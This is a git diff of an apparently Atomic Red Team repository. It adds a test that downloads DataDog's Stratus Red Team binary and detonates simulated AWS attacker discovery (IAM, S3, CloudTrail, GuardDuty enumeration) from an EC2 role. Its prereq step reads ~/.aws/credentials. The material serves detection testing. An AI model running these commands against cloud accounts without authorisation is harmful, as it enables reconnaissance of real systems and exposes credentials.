+This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets, iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails, ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors) from the context of an EC2 instance role. This simulates an attacker compromising an EC2 instance and running initial discovery commands on it. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+
+**Supported Platforms:** Linux, macOS
+
+
+**auto_generated_guid:** 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1580/src|
+| aws_region | AWS region to detonate | string | us-west-2|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+export AWS_REGION=#{aws_region}
+cd #{stratus_path}
+echo "Stratus: Start Warmup."
+./stratus warmup aws.discovery.ec2-enumerate-from-instance
+echo "Stratus: Start Detonate."
+./stratus detonate aws.discovery.ec2-enumerate-from-instance
+```
+
+#### Cleanup Commands:
+```sh
+cd #{stratus_path}
+echo "Stratus: Start Cleanup."
+./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+echo "Removing Stratus artifacts from local machine."
+rm -rf stratus*
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)
+##### Check Prereq Commands:
+```sh
+if test -f "#{stratus_path}/stratus"; then exit 0; else exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+if [ "$(uname)" = "Darwin" ]
+then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+elif [ "$(expr substr $(uname) 1 5)" = "Linux" ]
+then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i linux_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+fi
+```
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1580/T1580.yaml b/atomics/T1580/T1580.yaml
new file mode 100644
index 00000000..41f4b2df
--- /dev/null
+++ b/atomics/T1580/T1580.yaml
@@ -0,0 +1,55 @@
+attack_technique: T1580
+display_name: 'Cloud Infrastructure Discovery'
+atomic_tests:
+- name: AWS - EC2 Enumeration from Cloud Instance
+  auto_generated_guid: 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+  description: |
+    This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets, iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails, ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors) from the context of an EC2 instance role. This simulates an attacker compromising an EC2 instance and running initial discovery commands on it. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    stratus_path:
+      description: Path of stratus binary
+      type: path
+      default: $PathToAtomicsFolder/T1580/src
+    aws_region:
+      description: AWS region to detonate
+      type: string
+      default: us-west-2
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Stratus binary must be present at the (#{stratus_path}/stratus)
+    prereq_command: |
+      if test -f "#{stratus_path}/stratus"; then exit 0; else exit 1; fi
+    get_prereq_command: |
+      if [ "$(uname)" = "Darwin" ]
+      then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+        tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+      elif [ "$(expr substr $(uname) 1 5)" = "Linux" ]
+      then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i linux_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+        tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+      fi 
+  - description: |
+      Check if ~/.aws/credentials file has a default stanza is configured
+    prereq_command: |
+      cat ~/.aws/credentials | grep "default"
+    get_prereq_command: |
+      echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
+  executor:
+    command: |
+      export AWS_REGION=#{aws_region}
+      cd #{stratus_path}
+      echo "Stratus: Start Warmup."
+      ./stratus warmup aws.discovery.ec2-enumerate-from-instance
+      echo "Stratus: Start Detonate."
+      ./stratus detonate aws.discovery.ec2-enumerate-from-instance
+    cleanup_command: |
+      cd #{stratus_path}
+      echo "Stratus: Start Cleanup."
+      ./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+      echo "Removing Stratus artifacts from local machine."
+      rm -rf stratus*
+    name: sh
+    elevation_required: false
diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md
index 0119e408..101ce6bc 100644
--- a/atomics/T1609/T1609.md
+++ b/atomics/T1609/T1609.md
@@ -76,11 +76,6 @@ Attackers who have permissions, can run malicious commands in containers in the
 
 
 
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| command | Command to run | string | cat|
-
 
 #### Attack Commands: Run with `bash`! 
 
diff --git a/atomics/T1609/T1609.yaml b/atomics/T1609/T1609.yaml
index ddb32441..d6f2f278 100644
--- a/atomics/T1609/T1609.yaml
+++ b/atomics/T1609/T1609.yaml
@@ -38,11 +38,6 @@ atomic_tests:
 
   supported_platforms:
   - containers
-  input_arguments:
-    command:
-      description: Command to run
-      type: string
-      default: cat
   dependencies:
   - description: |
       docker must be installed
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 5f863df9..8ba8f3b4 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -1252,3 +1252,17 @@ e74e4c63-6fde-4ad2-9ee8-21c3a1733114
 81483501-b8a5-4225-8b32-52128e2f69db
 4541e2c2-33c8-44b1-be79-9161440f1718
 b8a563d4-a836-4993-a74e-0a19b8481bfe
+99ee161b-dcb1-4276-8ecb-7cfdcb207820
+3a15c372-67c1-4430-ac8e-ec06d641ce4d
+e62d23ef-3153-4837-8625-fa4a3829134d
+228c7498-be31-48e9-83b7-9cb906504ec8
+348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+bd13b9fc-b758-496a-b81a-397462f82c72
+830c8b6c-7a70-4f40-b975-8bbe74558acd
+d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+7a48f482-246f-4aeb-9837-21c271ebf244
+8dbfc15c-527b-4ab0-a272-019f469d367f
+3d257a03-eb80-41c5-b744-bb37ac7f65c7
+191db57d-091a-47d5-99f3-97fde53de505
+20b40ea9-0e17-4155-b8e6-244911a678ac
+433842ba-e796-4fd5-a14f-95d3a1970875